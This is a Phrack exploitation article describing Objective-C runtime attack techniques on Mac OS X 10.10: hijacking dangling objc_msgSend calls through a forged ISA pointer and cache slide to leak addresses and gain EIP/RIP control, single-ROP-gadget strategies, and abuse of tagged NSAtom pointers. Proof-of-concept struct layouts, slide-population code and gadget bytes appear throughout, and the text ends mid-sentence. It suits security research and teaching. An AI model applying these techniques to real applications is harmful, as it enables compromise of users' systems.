                              ==Phrack Inc.==

                Volume 0x0f, Issue 0x45, Phile #0x09 of 0x10

|=-----------------------------------------------------------------------=|
|=-----------=[ Modern Objective-C Exploitation Techniques ]=------------=|
|=-----------------------------------------------------------------------=|
|=----------------------------=[ by nemo ]=------------------------------=|
|=-----------------------=[ nemo@felinemenace.org ]=---------------------=|
|=-----------------------------------------------------------------------=|

--[ Introduction

Hello again reader. Over the years the exploitation process has obviously
grown in complexity. What once began with the straightforward case of
turning a single bug into a reliable exploit has now evolved towards
combining vulnerability primitives together in an attempt to bypass each
of the memory protection hurdles present on a modern-day operating system.

With this in mind, let's jump once again into the exploitation of
Objective-C based memory corruption vulnerabilities in a modern time.
Back in Phrack 0x42 (Phile #0x04) I wrote a paper documenting a way to turn
the most common Objective-C memory corruption primitive (an attacker
controlled Objective-C method call) into control of EIP. If you have not
read this paper, or if it's been a while and you need to refresh, it's
probably wise to do so now, as the first half of this paper will only build
on the techniques covered in the original [1]. Contrary to the beliefs of
Ian Beer, the techniques in the original paper are still alive and kicking
in modern times; however, some adjustment is needed depending on the
context of the vulnerability.

--[ Dangling Objective-C Method Calls

As you're aware since you read my paper in [1], Objective-C method calls
are implemented by passing "messages" to the receiver (object) via the
objc_msgSend() API call.
When Objective-C objects are allocated, storage for their instance
variables is allocated on the native heap with malloc(). The first element
in this space is a pointer to the class definition in the binary. This is
typically referred to as the "ISA" pointer. As in: "an NSString 'IS-A'
NSObject".

When dealing with bugs in Objective-C applications it is extremely common
for this ISA pointer to be attacker controlled, resulting in an Objective-C
method call being performed on an attacker controlled memory location.
This can occur when dealing with Use-After-Free conditions, heap overflows
into Objective-C objects, and even format string bugs using the %@ format
specifier.

In my original paper [1] I wrote about how to utilize this construct to
perform a successful cache lookup for the selector value, resulting in
control of EIP. An alternative route to gain EIP control is to make the
Objective-C runtime think that it's finished looking through the entire
cache and found no match for the SEL value passed in. In which case the
runtime will attempt to resolve the method's address via the class
definition (through the controlled ISA pointer) and once again use an EIP
value from memory controlled by us. This method is longer however, and adds
little benefit. But I digress; both of these methods are still completely
valid in the most current version of Mac OS X at this time, Yosemite
(10.10).

While, at the time of the Phrack 0x42 release, this technique was fairly
useful by itself, in modern times EIP/RIP control is only a small victory
and in no way wins the battle of process control. This is due to the fact
that even with direct control of EIP, modern NX and ASLR make it difficult
to know a reliable absolute location in which we can store a payload and
return to execute it.

From what I've seen, the most commonly used technique to bypass this
currently is to combine an EIP control primitive with an information leak
of a .text address in order to construct a ROP chain (returning repeatedly
into the text segment) which either executes the needed functionality,
mprotect()'s some shellcode before executing it, or loads an existing
executable or shared library.

Under the right conditions, it is possible to skip some of these steps
and turn a dangling Objective-C method call into both an information leak
and execution control.

In order to use this technique, we must first know the exact binary version
in use on the target. Thankfully on Mac OS X this is usually pretty easy as
automatic updates mean that most people are running the same binary
version.

The specifics of the technique differ depending on the architecture of the
target system, as well as the location of the particular SEL string which
is used in the dangling method call construct.

Since we are already familiar with 32-bit internals, we will begin our
investigation of dangling objc_msgSend() exploitation with the 32-bit
runtime, before moving on to look at the changes in the new run-time on
64-bit.

--[ 32-bit dangling objc_msgSend()

Firstly, 32-bit processes utilize the old Objective-C runtime, so the
specifics of the internals are identical to what is documented in my
original paper. However, depending on the location of the module
containing the selector string, the technique varies slightly.

----[ 32-bit Shared Region

The shared-region is a mapping which is common to all processes on the
system. The file '/var/db/dyld/dyld_shared_cache_i386' is mapped into this
space. This file is generated by the "update_dyld_shared_cache" utility
during system update, and contains a large selection of libraries which are
commonly used on the system. The .paths files in
"/var/db/dyld/shared_region_roots" dictate which files are contained
within. The order in which each library is added to this file is
randomized, therefore the offset into the file for a particular library
cannot be relied on. Reading the file
'/var/db/dyld/dyld_shared_cache_i386.map' shows the order of these files.

For 32-bit processes, this file is mapped at the fixed address 0x90000000.
At this location there is a structure which describes the contents of the
shared region.

This technique, once again, revolves around the ability to control the ISA
pointer, and to point it at a fake class struct in memory. In order to
demonstrate how this works, a small sample Objective-C class was created
(shown below). The complete example of this technique is included at the
end of this paper in the uuencoded files blob.

        [leakme.m]

        #import "leakme.h"

        @implementation leakme
        -(void) log
        {
            printf("lol\n");
        }
        @end

In main.m, we create an instance of this object, and then use sprintf() to
write out a string representation of the object's address, before
converting it back with atol(). This is pretty confusing, but it's
basically an easy way to trick the compiler into giving us a void pointer
to the object. Type casting the object pointer directly will not compile
with gcc.

        printf("[+] Class @ 0x%lx\n",l);
        sprintf(num,"%li",l);
        long *ptr = atol(num);
        ...
        printf("[+] Overwriting object\n");
        *ptr = &fc; // isa ptr

By overwriting the ISA pointer with the address of an allocation we
control, we can easily simulate a vulnerable scenario. Obviously in the
real world things are not that easy. We need to know the address of an
allocation which we control. There are a variety of ways this can be
accomplished. Some examples of these are:

- Using a leak to read a pointer out of memory.
- Abusing language weaknesses to infer an address. [2]
- Abusing the predictable nature of large allocations.

However, these concepts are the topic of many other discussions and not
relevant to this particular technique.

As a quick refresher, the first thing the Objective-C runtime does when
attempting to call a method for an object (objc_msgSend()) is to retrieve
the location of the method cache for the object. This is done by
offsetting the ISA pointer by 0x20 and reading the pointer at this
location. To control this cache pointer we use the following structure:

        struct fakecache {
            char pad[0x20];
            long cache_ptr;
        };

In the example code we use a separate allocation for the fakecache struct
and the cache itself. However in a real scenario the address of the cache
itself would most likely be the same address as the fakecache offset by
0x24. This would allow us to use a single allocation, and therefore a
single address, reducing the constraints of the exploit. Also, in a real
world case we could leak the address of the cache_ptr, then subtract 0x20
from its address. This would allow us to shave 0x20 bytes off of the
buffer we need to control.

Next, objc_msgSend() traverses the cache looking for a cached method call
matching the desired implementation. This is done by iterating through a
series of pointers to cache entries. Each entry contains a SEL which
matches the cached method SEL in the .text segment of the Objective-C
binary. By comparing this SEL value with the SEL value passed to
objc_msgSend() the matching entry can be located and used. Rather than
iterating through every pointer to find the appropriate cache entry each
time however, a mask is applied to the selector pointer. The masked off
bits are then shifted and used as an index into the cache table entry
pointer array. Then after this index is used, each entry is inspected.
This means that multiple entries can have the same index, however it
greatly reduces the search time of the cache. Controlling the mask provides
us with the mechanism we need to create a leak.

Ok, so going back to the mask. In my original Objective-C paper, we set the
mask to 0. This forced the index to 0 regardless of what value the SEL had,
so the runtime always looked at the first bucket. In this case however, we
want to abuse the mask in order to isolate the "randomized" unpredictable
bits in the selector pointer value (SEL).

Below, we can see a "real" SEL value from a 10.10 system, which is located
in the shared_region.

        (lldb) x/s $ecx
        0x90f3f86e: "length"

Since we know that the shared region begins at 0x90000000 we know that
the first hex digit (nibble) will always be 0x9. We also know that the
offset into the page which contains the SEL will always be the same,
therefore the last 3 hex digits (0x86e) will be the same for the binary
version we retrieve the SEL value from. However, we cannot count on the
rest of the SEL value being the same on the system we are running our
exploit against.

For the value 0x90f3f86e we can see the bit pattern looks as follows:

          9   0    f    3    f     8    6   e
        1001 0000 1111 0011 1111 1000 0110 1110 : 0x90f3f86e

Based on what we just discussed the mask which would retrieve the bits we
care about looks as follows:

         0    f    f     f   f     0   0    0
        0000 1111 1111 1111 1111 0000 0000 0000 : 0x0ffff000

However, since objc_msgSend() shifts the SEL 2 bits to the right prior to
applying the mask, we must shift our mask to account for this.

This leaves us with:

         0    3    f    f    f    c    0    0
        0000 0011 1111 1111 1111 1100 0000 0000 : 0x03fffc00

As you remember, objc_msgSend() applies the following calculation to
generate the index into the cache entries:

        index = (SEL >> 2) & mask

Filling in the values for this leaves us with an index like:

        index = (0x90f3f86e >> 2) & 0x03fffc00 == 0x3cfc00

This means that for our particular SEL value the runtime will index
0x3cfc00 * 4 (0xf3f000) bytes forward, and take the bucket pointer from
this location. It will then dereference the pointer and check for a SEL
match at that location. By creating a giant cache slide containing an
entry for every possible value of the randomized bits, we can make sure
that this location contains the right SEL value for whichever slide is in
use.
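
The index arithmetic above is easy to double check with a few lines of C.
This is only a sketch: the helper names (shift_mask, cache_index,
bucket_byte_offset) are made up for illustration and are not part of the
runtime. They simply mirror the (SEL >> 2) & mask calculation described in
this section, using fixed-width 32-bit integers so the result does not
depend on the host.

```c
#include <assert.h>
#include <stdint.h>

/* Hypothetical helpers; the names are illustrative only. */

/* A mask written against the raw SEL has to be shifted right by 2,
 * because the SEL itself is shifted before the mask is applied. */
uint32_t shift_mask(uint32_t unshifted_mask)
{
    return unshifted_mask >> 2;
}

/* index = (SEL >> 2) & mask, as described in the text. */
uint32_t cache_index(uint32_t sel, uint32_t mask)
{
    return (sel >> 2) & mask;
}

/* Each bucket is a 4 byte pointer in the 32-bit runtime, so the byte
 * offset into the buckets array is index * 4. */
uint32_t bucket_byte_offset(uint32_t index)
{
    assert(index <= UINT32_MAX / 4u); /* avoid silent wrap-around */
    return index * 4u;
}
```

Feeding in the values from this section, shift_mask(0x0ffff000) gives
0x03fffc00, cache_index(0x90f3f86e, 0x03fffc00) gives 0x3cfc00 and
bucket_byte_offset(0x3cfc00) gives 0xf3f000.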

In the 32-bit runtime (the old runtime) the cache index is used to retrieve
a pointer to a cache_entry from an array of pointers (buckets).
In our example code (main.m) we set the buckets array up as follows:

        long *buckets = malloc((CACHESIZE + 1) * sizeof(void *));

However, in a typical exploitation scenario, this array would be part of
the single large allocation which we control.

For each of the buckets pointers, a cache entry must be allocated. In the
example code we can use the following struct for each of these entries:

        struct cacheentry {
                long sel;
                long pad;
                long eip;
        };


Each of these structures must be populated with a different SEL and EIP
value depending on its index into the table. For each of the possible
index values, we add the (unshifted) randomized bits to the SEL base.
This way the appropriate SEL is guaranteed to match after the mask is
applied and used to index the table.

For the EIP value, we can utilize the fact that the string table containing
the SEL string is always going to be relative to the .text segment within
the same binary. The diagram below shows this more clearly.

        ,_______________,<--- Mach-O base address
        |               |
        | mach-o header |
        +---------------+
        |               |<--- SEL in string table, relative to base
        | string table  |    /\ Relative offset
        +---------------+    \/ from SEL to ROP gadgets
        |               |<--- ROP gadget in .text segment
        | .text segment |
        '---------------'

For each possible entry in the table, the EIP value must be set to the
appropriate address relative to the SEL value used. The quickest way I know
to calculate these values is to break on the objc_msgSend function and dump
the current SEL value. In lldb this is simply a case of using "reg read
ecx". Next, "target module list -a $ecx" provides us with the module base.
By subtracting the module base from the absolute SEL address we can get the
relative offset within the module. This can be repeated for the gadget
address within the same module. Next, when populating the table, we simply
need to add these two relative offsets to our potential module base
candidate. We increment the module base candidate for each entry in the
table.
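
The population step described above could be sketched roughly as follows.
This is not the code from main.m; the struct name cacheentry32, the
functions make_entry and fill_entries, and the idea of stepping the module
base candidate one page (0x1000) at a time are all assumptions made for
illustration. The sel_off and gadget_off parameters stand for the two
relative offsets obtained from lldb.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* 32-bit cache entry layout from the text, with fixed-width fields so
 * the sketch behaves the same on a 64-bit host. */
struct cacheentry32 {
    uint32_t sel;
    uint32_t pad;
    uint32_t eip;
};

/* Build one entry for a given module base candidate (hypothetical
 * helper). Both SEL and gadget live in the same module, so both are
 * derived from the same base. */
struct cacheentry32 make_entry(uint32_t base_candidate,
                               uint32_t sel_off, uint32_t gadget_off)
{
    struct cacheentry32 e;
    e.sel = base_candidate + sel_off;
    e.pad = 0;
    e.eip = base_candidate + gadget_off;
    return e;
}

/* Fill n entries, moving the base candidate forward one page each
 * time (the page-sized step is an assumption of this sketch). */
void fill_entries(struct cacheentry32 *out, uint32_t n,
                  uint32_t first_base,
                  uint32_t sel_off, uint32_t gadget_off)
{
    assert(out != NULL);
    for (uint32_t i = 0; i < n; i++)
        out[i] = make_entry(first_base + i * 0x1000u,
                            sel_off, gadget_off);
}
```

Whatever base candidate ends up matching, the distance between the sel and
eip fields is the same in every entry, which is exactly the property the
diagram above relies on.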

By populating our cache slide in this way we are guaranteed the execution
of a single ROP gadget within the module that our SEL is in. This can be
enough for us to succeed. We will look into ways to use this construct
later.

Obviously the allocation used for this 32-bit technique is very large. To
calculate the size of the cache slide which we need to generate we need to
look at the size of the shared region. The shared region always starts at
0x90000000, but the first module inside the shared region starts at
0x90008000. The end of the shared region depends on the number of modules
loaded in the shared region. On the latest version of Mac OS X at this
time, the end of the shared region is located at 0x9c391000. The bit
patterns for these are shown below.

10010000 00000000 10000000 00000000 :: SR START -- 0x90008000
10011100 00111001 00010000 00000000 :: SR END   -- 0x9C391000

00001111 11111111 11110000 00000000 :: MASK UNSHIFTED

If we compare this to the unshifted mask, and mask off the bits we care
about we get the following values for our potential index values.

00000000 00000000 00100000 00000000  -- smallest index value - 0x2000
00000011 00001110 01000100 00000000  -- biggest  index value - 0x30E4400

Since the buckets array is an array of 4 byte pointer values we can
multiply the largest index by 4, giving us 0xc391000. Each cache entry
pointed to by a bucket is 12 bytes in size. This means that the size of the
cache entry array is 0x24ab3000.

By adding these two values together we get the total size of our cache
slide, 0x30e44000 bytes.
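
For anyone wanting to redo these numbers for a different shared region
size, the arithmetic can be sketched in C as below. The function names are
hypothetical, and the constants are simply the ones quoted in this section
(a 4 byte bucket pointer, a 12 byte cache entry and the unshifted mask
0x0ffff000). The sizes are computed as one entry per index value, the same
way the text does.

```c
#include <assert.h>
#include <stdint.h>

#define UNSHIFTED_MASK   0x0ffff000u
#define BUCKET_PTR_SIZE  4u   /* 32-bit pointer per bucket    */
#define CACHE_ENTRY_SIZE 12u  /* sel + pad + eip, 4 bytes each */

/* Index the runtime would derive for a SEL at the given address. */
uint32_t slide_index(uint32_t addr)
{
    return (addr >> 2) & (UNSHIFTED_MASK >> 2);
}

uint64_t buckets_bytes(uint32_t max_index)
{
    return (uint64_t)max_index * BUCKET_PTR_SIZE;
}

uint64_t entries_bytes(uint32_t max_index)
{
    return (uint64_t)max_index * CACHE_ENTRY_SIZE;
}

uint64_t slide_bytes(uint32_t max_index)
{
    return buckets_bytes(max_index) + entries_bytes(max_index);
}

/* Re-derive the figures quoted in the text; aborts if any differ. */
void check_article_figures(void)
{
    uint32_t lo = slide_index(0x90008000u); /* first module   */
    uint32_t hi = slide_index(0x9c391000u); /* end of region  */

    assert(lo == 0x2000u);
    assert(hi == 0x30e4400u);
    assert(buckets_bytes(hi) == 0xc391000ull);
    assert(entries_bytes(hi) == 0x24ab3000ull);
    assert(slide_bytes(hi) == 0x30e44000ull);
}
```

Calling check_article_figures() returns silently when the values match the
ones above; swapping in a different end address gives the slide size for
another build.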

Allocations of this size can be difficult to make depending on the target
application. However, also due to the size, they are predictably placed
within the address space. This buffer can be made from JavaScript for
example.

----[ Uncommon 32-bit Libraries

Libraries which are not contained within the shared region are mapped in by
the linker when an executable is loaded that requires them as a dependency.

The location of these modules is always relative to the end of the
executable file and is loaded in the order specified in the LC_LOAD_DYLIB
header.

When loading the executable file, the kernel generates a randomized slide
value for ASLR. This value is added to the desired segment load addresses
in the executable (if it's compiled with PIE) and then the executable is
re-based to that location.

        uintptr_t requestedLoadAddress = segPreferredLoadAddress(i) +
            slide;

The slide value is calculated by the kernel and then passed to the main
function of the dynamic loader. The following algorithm is responsible for
generating the slide value.

        aslr_offset = (unsigned int)random();
        max_slide_pages = vm_map_get_max_aslr_slide_pages(map);
        aslr_offset %= max_slide_pages;
        aslr_offset <<= vm_map_page_shift(map);

where:

        uint64_t
        vm_map_get_max_aslr_slide_pages(vm_map_t map)
        {
                return (1 << (vm_map_is_64bit(map) ? 16 : 8));
        }


        int
        vm_map_page_shift(
                vm_map_t map)
        {
                return VM_MAP_PAGE_SHIFT(map);
        }

        #define VM_MAP_PAGE_SHIFT(map) \
            ((map) ? (map)->hdr.page_shift : PAGE_SHIFT)
        #define PAGE_SHIFT I386_PGSHIFT
        #define I386_PGSHIFT 12

So for example, a random() value of 0xdeadbeef, would end up as the value
0xef000. With the following calculation:

        slide = ((0xdeadbeef % (1<<8)) << 12)
        slide = 0xef000

The gcc compiler and llvm both (by default) use a load address of 0x1000
for the text section of an executable. So for the slide value 0xef000 the
executable file would be based at 0x1000 + 0xef000 = 0xf0000.
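
The slide calculation can be modelled in user space with a short C sketch.
This is not kernel code: aslr_slide and slid_text_base are hypothetical
names, the random value is passed in rather than taken from random(), and
the page shift is hard-wired to the I386_PGSHIFT value of 12 shown above.

```c
#include <assert.h>
#include <stdint.h>

#define PAGE_SHIFT_X86 12 /* I386_PGSHIFT from the kernel source */

/* Mirrors vm_map_get_max_aslr_slide_pages(): 2^8 pages for 32-bit
 * maps, 2^16 pages for 64-bit maps. */
uint64_t max_slide_pages(int is_64bit)
{
    return 1ull << (is_64bit ? 16 : 8);
}

/* Same three steps as the kernel snippet: take the random value,
 * reduce it modulo the page count, shift it up to a page boundary. */
uint64_t aslr_slide(uint32_t random_value, int is_64bit)
{
    uint64_t off = random_value;
    off %= max_slide_pages(is_64bit);
    off <<= PAGE_SHIFT_X86;
    return off;
}

/* Preferred load address plus slide (hypothetical helper). */
uint64_t slid_text_base(uint64_t preferred, uint32_t random_value,
                        int is_64bit)
{
    uint64_t slide = aslr_slide(random_value, is_64bit);
    assert(preferred <= UINT64_MAX - slide); /* no overflow */
    return preferred + slide;
}
```

With random_value set to 0xdeadbeef and is_64bit set to 0, aslr_slide()
yields 0xef000 and slid_text_base(0x1000, ...) yields 0xf0000, matching
the worked example.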

This means that for the most part, you're dealing with roughly 1 byte of
unpredictable bits. Depending on the number of libraries loaded which are
outside of the shared region, this fluctuates, however libraries are always
loaded in the order stipulated by the executable itself, so this is fairly
predictable.

For our dangling objc_msgSend technique this means that our mask fluctuates
depending on the target. In the best case, masking off the single byte in
the address can be achieved by using the mask (0x000ff000 >> 2) == 0x3fc00.

--[ 64-bit dangling objc_msgSend()

The 64-bit version of this technique is quite different to its 32-bit
brethren. This is mostly due to the fact that 64-bit processes use a
whole new version of the runtime.

In the new runtime, the objc_class structure is no longer a basic C
structure. Instead it is a C++ struct which inherits from objc_object and
includes methods.

The memory footprint for the new class is shown below.

struct objc_class : objc_object {
    // Class ISA;
    Class superclass;
    cache_t cache;             // formerly cache pointer and vtable
    class_data_bits_t bits;    // class_rw_t * plus custom rr/alloc flags
...
}

The cache_t struct looks as follows:

struct cache_t {
    struct bucket_t *_buckets;
    mask_t _mask;
    mask_t _occupied;
...
}

and a bucket_t struct looks like:

struct bucket_t {
private:
    cache_key_t _key;
    IMP _imp;
...
}

Putting this together, the main thing that has changed regarding the cache
lookup is that, rather than an array of pointers to cache entries, there is
simply a single pointer to an array of SEL + method address entries at
offset 0x10 into the structure. Following this, there's the mask, followed
by an occupied field tracking the entries which exist in the cache.

The critical difference in the run-time is the way the mask is used to
index into this table. Rather than the (SEL >> 2) value in the 32-bit
runtime, the index is calculated via ((SEL & mask) << 4). This means, if we
were to abuse the mask in a similar way to the 32-bit technique we would
need a mask of 0xffff0000 in order to isolate the randomized bits.
Obviously even if we were able to make an allocation big enough to contain
the cache slide necessary for this, populating 4GB worth of cache entries
to catch the index would be so time consuming that this is not really a
feasible process.

Instead we must utilize an additional characteristic of the new runtime.
The objc_msgSend() call at a high level looks as follows:

        ISA = *class_ptr;
        offset = ((SEL & ISA->mask) << 4);

        while(ISA->buckets[offset].SEL != 0) {
                if(ISA->buckets[offset].SEL == SEL) {
                        return ISA->buckets[offset].method(args);
                } else {
                        offset--;
                        continue;
                }
        }

This means that if we once again create a large slide containing entries
for all possible randomized bits, we simply need to point (using the index
we control) the runtime to the end of our slide, and let it walk backwards
until it finds a match.
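
To make the backwards walk concrete, here is a small user-space model of
the pseudocode above. It is a sketch under a few assumptions: bucket64 and
walk_back are invented names, the starting position is given as an array
index rather than a byte offset, and the walk simply stops at the start of
the array instead of doing whatever the real runtime does at that point.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* SEL + method address pair, as in the bucket_t description. */
struct bucket64 {
    uint64_t sel;
    uint64_t imp;
};

/* Walk backwards from 'start' until a bucket matches 'sel'.
 * Returns the stored method address, or 0 when an empty bucket
 * (sel == 0) or the start of the array is reached first. */
uint64_t walk_back(const struct bucket64 *buckets, size_t start,
                   uint64_t sel)
{
    assert(buckets != NULL);

    size_t i = start;
    for (;;) {
        if (buckets[i].sel == 0)
            return 0;               /* empty bucket: cache miss */
        if (buckets[i].sel == sel)
            return buckets[i].imp;  /* match: this would be called */
        if (i == 0)
            return 0;               /* model only: stop at array start */
        i--;
    }
}
```

Pointing start at the last element of a populated slide means every entry
below it gets a chance to match, which is the behaviour the technique
leans on.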

----[ 64-bit Shared Region

In order to investigate this technique, we will begin again by looking at
the shared region on 64-bit processes. The shared region starts at the
address 0x7FFF80000000. Once again a cache file is mapped in, this time
from /var/db/dyld/dyld_shared_cache_x86_64. This file is, once again,
randomized upon creation, however in 64-bit processes there is also a
random slide added to the file when it is mapped in. This is calculated
using sizeof(shared_region) - sizeof(cache file) as the max. As far as our
technique goes however this does not really change very much.

Calculating the mask value for this technique can be challenging. There are
a few constraints which we must work against in order to index our bucket
list to the last entry.

To investigate this we will take a typical SEL value, 0x00007fff99f88447.
The bit pattern is broken down below.

SEL:
 0x00       00       7f       ff       99       f8       84       47
00000000 00000000 01111111 11111111 10011001 11111000 10000100 01000111

Unfortunately the mask variable is only 4 bytes long. This means that the
predictable bits in the upper 32 bits of the SEL are not available to us.
Also, the last 12 static bits (offset into page - 0x447) would result in an
index that is too small. If we used those bits we would not have a large
enough offset to index to the end of the slide. Luckily, we have one single
static bit, the top bit of the lower 32 bits (0x80000000), which we can
count on being set. We can take advantage of this bit with the following
mask.

Mask:
 0x00       00       00       00       80       00       00       00
00000000 00000000 00000000 00000000 10000000 00000000 00000000 00000000

Applying this bit to any SEL value within the shared region will guarantee
the offset 0x80000000. Clearly this value is way beyond the end of our
required slide, however since we also control the pointer to the bucket
slide, we can subtract (0x80000000 - sizeof(cache)) from the pointer value
to force it to point to the right location.
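
A quick way to convince yourself that the single mask bit behaves as
described is to apply it to a range of addresses. The sketch below does
only that; it does not model the bucket pointer adjustment. The names
masked_sel and bit_set_for_range are hypothetical, and the caller supplies
the address range to test.

```c
#include <assert.h>
#include <stdint.h>

#define MASK_TOP_BIT 0x80000000u /* mask value from the diagram above */

/* The mask is only 32 bits wide, so only the low half of the SEL
 * takes part in the AND. */
uint32_t masked_sel(uint64_t sel, uint32_t mask)
{
    return (uint32_t)sel & mask;
}

/* Returns 1 if every page-aligned address in [lo, hi) produces the
 * same masked value of 0x80000000, and 0 otherwise. */
int bit_set_for_range(uint64_t lo, uint64_t hi)
{
    assert(lo <= hi);
    for (uint64_t a = lo; a < hi; a += 0x1000ull) {
        if (masked_sel(a, MASK_TOP_BIT) != MASK_TOP_BIT)
            return 0;
    }
    return 1;
}
```

For the example SEL 0x00007fff99f88447 the masked value is 0x80000000, and
the same holds for the shared region base 0x7FFF80000000. How far above
the base it keeps holding depends on the size of the region, which should
be checked against the target rather than assumed.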

The example code main64.m demonstrates this technique. In this code, we use
a fakecache structure to control the initial cache lookup. A pad is used to
correctly position the bucket pointer and mask.

        struct fakecache {
           char pad[0x10];
           long bucketptr;
           long mask;
        };

Next, we allocate an array of cache entry structs in order to hold our SEL
slide. Obviously in a real attack all these elements would be in a single
allocation, however for this example we will split them up for clarity.

        struct cacheentry {
                long sel;
                long rip;
        };

        struct cacheentry *buckets =
            malloc((NUMBUCKETS + 1) * sizeof(struct cacheentry));

Initializing each of these elements is simply a case of incrementing the
random value added to the SEL each time, and populating each entry.

Again, the RIP value is calculated by adding a relative offset to the SEL
in order to locate our ROP gadget.

        for(slide = 0; slide < NUMBUCKETS ; slide++) {
                buckets[slide].sel = BASESEL + (slide * 0x1000);
                buckets[slide].rip = buckets[slide].sel - 75654446;
        }

----[ Uncommon 64-bit Libraries

Once again, libraries which are not within the shared region are mapped
directly after the executable image in memory. Typically the text segment
address generated by the compiler is 0x100000000.

The same code is used to generate the slide that we looked at earlier in
the 32-bit section. Here is an example of a slide for a 64-bit process with
the random() value of 0xdeadbeef.

        slide         = ((0xdeadbeef % (1<<16)) << 12)
        slide         = 0xbeef000
        example SEL   = 0x10beef447

As you can see, in this example, there is no predictable bit in the lower
32-bits of the SEL which we can rely on to index to the end of our table.
Our only option here is to utilize the random bits in the SEL. We can do
this by repeating the entire spectrum of randomized values in our slide
multiple times. This way depending on the value of the random bits a
different offset will occur into the slide, however in most scenarios it
will result in finding one instance of the correct entry.

--[ Single Gadget Exploitation Strategies

Now that we've looked at how to get execution to a predictable location of
our choice, the next step is to look at some ways to utilize this to our
advantage.

Obviously there is an abundance of ways that this can be utilized, but the
following 3 methods are ways that I have seen succeed in real life.

----[ Return SEL Gadget

At the moment when we gain execution control using this technique a
register value contains the SEL pointer value. We can use this fact to our
advantage. For example, for 32-bit code, the following gadget could take
advantage of this.

                00000000  89C8              mov eax,ecx
                00000002  5E                pop esi
                00000003  5D                pop ebp
                00000004  C3                ret

The gadget above moves the SEL pointer value into the eax register, which
is treated as the return value on function return. Next it pops ESI and
EBP from the stack and uses the ret instruction to return from the
function. As a result, rather than the expected return value for whatever
Objective-C method was dangling, the SEL value is returned.

This is only a useful approach if we are able to retrieve the value from
this context and utilize it to re-trigger the bug. In the example code
provided, the use of this gadget causes the SEL value to be printed, rather
than the length of the NSString which is intended. You can see the result
of this below.

        -[nemo@objcbox:code]$ ./leak
        [+] buckets is 0x10000000 size.
        [+] cacheentry is 0x30000000 size.
        [+] Setting up buckets
        [+] Done
        [+] Class @ 0x78622240
        [+] Overwriting object
        [+] Calling method
        String length: 0x93371b88

Likewise, in some cases it may not make sense to return the SEL directly.
If it is not possible to retrieve the leaked value upon return it may make
more sense to execute a gadget which writes ecx somewhere in memory. For
example in a web browser context, writing the ecx register into a
JavaScript array which is attacker controlled may result in the ability to
"collect" this value from JavaScript context and re-trigger the bug.

----[ Self Modifying ROP

Another potential use of the single gadget execution primitive is to use
the ecx register containing SEL to modify the rest of a ROP chain prior to
pivoting to use it.

I have never personally been successful with this, however I have seen this
done in a friend's exploit.

Finding a gadget which accomplishes all this is extremely challenging.

----[ Arbitrary Write Gadget

The final method for using a single gadget to continue the exploitation
process is to turn the execution primitive into an arbitrary write
primitive.

It is usually fairly straightforward to find a gadget which allows you to
write any high value to a fixed location. By positioning something at this
location (e.g. 0x0d0d0d0d) this single write can be leveraged to escalate
the available functionality. For example, in a web context, positioning a
JavaScript array or string at this location then writing to the length
field can be enough to gain an arbitrary read/write primitive from
JavaScript. This is easily enough to finish the exploitation process.

Outside of the browser context there are still a variety of length encoded
data types which can be used for this. Specific to Objective-C, the
NSMutableArray/NSArray classes work this way.

--[ Tagged Pointers

One of the new features added to the Objective-C runtime is the usage of
"tagged pointers" to conserve resources. Tagged pointers take advantage of
the fact that the system memory allocator will align pointers handed out on
natural alignment boundaries. This means that the low bit will never be
set.

        (lldb) print (long)malloc_good_size(1)
        (long) $0 = 16

The runtime takes advantage of this lower bit in order to indicate that the
pointer value is not to be treated as a regular pointer, and instead, bits
61-63 (counting from the most significant bit, as in the diagram below) are
used as an index into a table of potential ISA pointers, registered with
the system. This means the first 60 bits can then be used to store the
object payload itself inline.

        Tagged pointer layout

11111111 11111111 11111111 11111111 11111111 11111111 11111111 1111[111][1]
                                                                     |   |
                                                                     |  tag
                                                                   index

As mentioned, the index bits index into a table of potential object types.
The default types registered with the runtime are shown below.

    OBJC_TAG_NSAtom            = 0,
    OBJC_TAG_1                 = 1,
    OBJC_TAG_NSString          = 2,
    OBJC_TAG_NSNumber          = 3,
    OBJC_TAG_NSIndexPath       = 4,
    OBJC_TAG_NSManagedObjectID = 5,
    OBJC_TAG_NSDate            = 6,
    OBJC_TAG_7                 = 7

It is possible for a developer to add their own types to the table, however
it is very uncommon for anyone to do this. The guide at [3] clearly
illustrates the mechanics of tagged pointers, if you require more
information.
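
Decoding a value according to the layout drawn above takes only a few
shifts. The sketch below follows that diagram and nothing else: the
function names are hypothetical, and the bit positions (tag in the lowest
bit, index in the three bits above it, payload in the remaining 60) are
taken from this section rather than from any runtime header, so other
runtime versions or architectures may differ.

```c
#include <assert.h>
#include <stdint.h>

/* Low bit set means "not a real pointer". */
int is_tagged(uint64_t p)
{
    return (int)(p & 1u);
}

/* Three bits directly above the tag bit select the class. */
unsigned tag_index(uint64_t p)
{
    assert(is_tagged(p));
    return (unsigned)((p >> 1) & 0x7u);
}

/* Everything above the tag and index bits is inline payload. */
uint64_t tag_payload(uint64_t p)
{
    assert(is_tagged(p));
    return p >> 4;
}
```

Under this layout the value 0x1 decodes as tagged with index 0
(OBJC_TAG_NSAtom), while 0x7 decodes as index 3 (OBJC_TAG_NSNumber) with
an empty payload.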

Now that we've looked at how tagged pointers work, we will investigate some
of them from an exploitation perspective.

----[ Tagged NSAtom

NSAtom is an extremely handy object type for exploitation. In order to use
a tagged NSAtom, we simply need the low bit set indicating a tagged
pointer, and then no bits set in the index bits. The value 0x1 by itself
for example will satisfy this. The beautiful thing about the NSAtom class
is that calling any method name on this class will result in success.

The example code below simply calls the method initWithUTF8String on the
object 0x1. Clearly this is not a valid pointer, and instead is treated as
an NSAtom. Any method name could be used and the result would still be 1.

int main(int argc, const char * argv[])
{
        printf("[+] NSAtom returned: %u\n",[1 initWithUTF8String:"lol"]);
        return 0;
}

$ ./nsatom
[+] NSAtom returned: 1

As you can imagine, this behavior can be extremely useful for
continuation of execution (CoE) or general exploitation. An example
scenario would be, if you are forced to write through several Objective-C
object pointers on the path to an overwrite target, any method call on
those objects would require valid pointers/fake object setup. However with
the NSAtom tagged pointer type, simply replacing these pointers with the
value 0x1 can be enough to stop the crash and take advantage of the
overwrite target.

Also, in extremely specific cases, the fact that this object returns true
can be used to manipulate the path of the program.

----[ Tagged NSString

The next tagged pointer type we will investigate is the tagged NSString.
With the new runtime, when an NSString is created, the size of the string
during initialization dictates the type of storage for the string.

Strings which are greater than 7 bytes in length are stored on the heap in
a typical Objective-C NSString object. However, for strings of 7 bytes or
less, a tagged pointer with the index 2 is used. The bit pattern for a
tagged NSString is shown below. It is comprised of 7 bytes of string data,
